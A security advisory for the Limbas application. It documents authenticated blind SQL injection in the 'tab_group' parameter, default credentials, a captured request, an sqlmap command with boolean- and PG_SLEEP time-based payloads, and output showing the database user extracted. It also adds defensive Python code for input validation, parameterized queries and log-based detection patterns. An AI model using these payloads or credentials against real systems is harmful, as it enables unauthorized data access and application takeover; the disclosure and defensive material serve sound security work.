Vendor Homepage: https://www.limbas.com/en/
Github Link: https://github.com/limbas/limbas
Tested on: Kali Linux + Apache 2.4.57 + PHP 8.2.13 (https://hub.docker.com/r/limbas/limbas)
After logging in (default credentials: admin/limbas), the "tab_group" parameter on the page "/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2" is vulnerable to blind SQL injection. Defensive measures such as input validation or parameterized SQL queries are recommended. Exploiting this vulnerability could enable an attacker to take control of the application, alter or access data, or leverage recent vulnerabilities present in the underlying database. (https://github.com/limbas/limbas/blob/master/src/limbas_src/main_admin.php)
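The two defensive measures recommended above, shown side by side with the pattern that causes the problem. This is an added example and not Limbas code; the table, its contents and the use of an in-memory SQLite database as a stand-in for the application's PostgreSQL backend are all assumptions made for the demonstration, and the "tab_group" values are constructed from the payload shapes sqlmap reported.

```python
"""Added example (not Limbas code): why the 'tab_group' request parameter must
be validated and bound, demonstrated against an in-memory SQLite table that
stands in for the PostgreSQL table the real application queries (assumption)."""
import re
import sqlite3
from typing import List, Optional

# Constructed tab_group values shaped like the boolean-based payloads sqlmap used.
BOOLEAN_TRUE = "1 AND 5959=5959"
BOOLEAN_FALSE = "1 AND 1=2"


def make_db() -> sqlite3.Connection:
    """Build a constructed sample table; the real schema is an assumption."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tab_groups (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO tab_groups VALUES (?, ?)",
                     [(1, "group-one"), (2, "group-two")])
    return conn


CONN = make_db()


def lookup_unsafe(tab_group: str) -> List[str]:
    """Vulnerable pattern: the raw request value is concatenated into the SQL text,
    so 'AND <true>' and 'AND <false>' change the result set (the blind oracle)."""
    sql = f"SELECT name FROM tab_groups WHERE id = {tab_group}"
    return [row[0] for row in CONN.execute(sql)]


def parse_tab_group(raw: Optional[str]) -> Optional[int]:
    """Input validation: accept only a plain decimal integer, nothing else."""
    if raw is None or not re.fullmatch(r"[0-9]{1,9}", raw):
        return None
    return int(raw)


def lookup_safe(tab_group: str) -> List[str]:
    """Hardened pattern: validate first, then bind the value as a query parameter
    so the database never parses request data as SQL."""
    tab_id = parse_tab_group(tab_group)
    if tab_id is None:
        return []  # reject; a real handler would answer HTTP 400 here
    rows = CONN.execute("SELECT name FROM tab_groups WHERE id = ?", (tab_id,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    print("unsafe, true  :", lookup_unsafe(BOOLEAN_TRUE))   # row returned
    print("unsafe, false :", lookup_unsafe(BOOLEAN_FALSE))  # no row: the oracle
    print("safe,   true  :", lookup_safe(BOOLEAN_TRUE))     # rejected outright
    print("safe,   '1'   :", lookup_safe("1"))              # the only accepted form
```

The validator rejects anything that is not a bare integer before the query is built, and the bound parameter would protect the query even if validation were skipped; in PHP the equivalent is an integer cast or `filter_var(..., FILTER_VALIDATE_INT)` followed by `pg_query_params` or a PDO prepared statement.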
After logging in, open this address: localhost/main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2
- First, inject "1+and+1=1" as the value of "tab_group"; the response is normal.
- Then inject "1+and+1=2" as the value of "tab_group"; the response differs.
- Intercept this request with Burp Suite, copy it, and save it to a file named "sqlinjection.txt".
GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2 HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: LMB_SESS_ID=h2i9p2if9lq5trnkmor49qs698
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
- Using sqlmap, data can be extracted successfully:
sqlmap -r sqlinjection.txt --batch --current-user
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tab_group (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 5959=5959&atid=2
Type: time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: action=setup_gtab_ftype&group_bzm=&tab_group=1 AND 4788=(SELECT 4788 FROM PG_SLEEP(5))&atid=2
---
[02:26:32] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian
web application technology: PHP 8.2.13, Apache 2.4.57
back-end DBMS: PostgreSQL
[02:26:32] [INFO] fetching current user
[02:26:32] [INFO] resumed: limbasuser
current user: 'limbasuser'
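For detection, the payload shapes in the sqlmap output above (a boolean tail such as "AND 5959=5959", or a "PG_SLEEP(" call) are easy to spot in the web server's access log, because a legitimate "tab_group" value is a plain integer. The following scanner is an added example, not part of the advisory or of Limbas: it parses Apache combined-format request lines, extracts "tab_group" from requests to /main_admin.php, and tags anything that is not an integer. The log lines are constructed for the example, not captured from a real server.

```python
"""Added example (not from the advisory or Limbas): flag requests to
main_admin.php whose tab_group parameter is not a plain integer and tag the
SQL-injection signatures seen in the advisory's sqlmap output.
The log lines below are constructed, not captured from a real server."""
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines: one benign request, three shaped
# like the advisory's payloads (form-encoded and percent-encoded), one unrelated.
SAMPLE_LOG = """\
127.0.0.1 - - [01/Jan/2024:02:26:30 +0000] "GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1&atid=2 HTTP/1.1" 200 5120
127.0.0.1 - - [01/Jan/2024:02:26:31 +0000] "GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1+and+1=2&atid=2 HTTP/1.1" 200 812
127.0.0.1 - - [01/Jan/2024:02:26:32 +0000] "GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1%20AND%205959%3D5959&atid=2 HTTP/1.1" 200 5120
127.0.0.1 - - [01/Jan/2024:02:26:33 +0000] "GET /main_admin.php?action=setup_gtab_ftype&group_bzm=&tab_group=1%20AND%204788%3D%28SELECT%204788%20FROM%20PG_SLEEP%285%29%29&atid=2 HTTP/1.1" 200 5120
127.0.0.1 - - [01/Jan/2024:02:26:34 +0000] "GET /index.php HTTP/1.1" 200 300
"""

# The quoted request line inside a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures matching the injection types sqlmap reported (boolean- and time-based).
SIGNATURES: Dict[str, "re.Pattern[str]"] = {
    "boolean": re.compile(r"\b(?:and|or)\b\s+\S+\s*=\s*\S+", re.I),
    "time":    re.compile(r"pg_sleep\s*\(", re.I),
    "sql-kw":  re.compile(r"\b(?:select|union|sleep)\b", re.I),
}


def tab_group_values(line: str) -> List[str]:
    """Return every tab_group value in a request to /main_admin.php (decoded)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    if parts.path != "/main_admin.php":
        return []
    # parse_qs decodes both '+' and percent-encoding, so signatures see plain text.
    return parse_qs(parts.query, keep_blank_values=True).get("tab_group", [])


def classify(value: str) -> List[str]:
    """Tags for a tab_group value; an empty list means it is a plain integer."""
    if re.fullmatch(r"[0-9]+", value):
        return []
    tags = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return tags or ["non-integer"]


def scan(log_text: str) -> List[Tuple[int, str, List[str]]]:
    """Return (line number, decoded value, tags) for each suspicious tab_group."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        for value in tab_group_values(line):
            tags = classify(value)
            if tags:
                findings.append((n, value, tags))
    return findings


if __name__ == "__main__":
    for line_no, value, tags in scan(SAMPLE_LOG):
        print(f"line {line_no}: {value!r} -> {', '.join(tags)}")
```

Because the benign form of the parameter is so narrow, the "non-integer" tag alone is a high-signal alert for this endpoint; the signature tags only add context about which injection technique was attempted. The same check on the "tab_group" value, applied at the application layer, is the input-validation fix the advisory recommends.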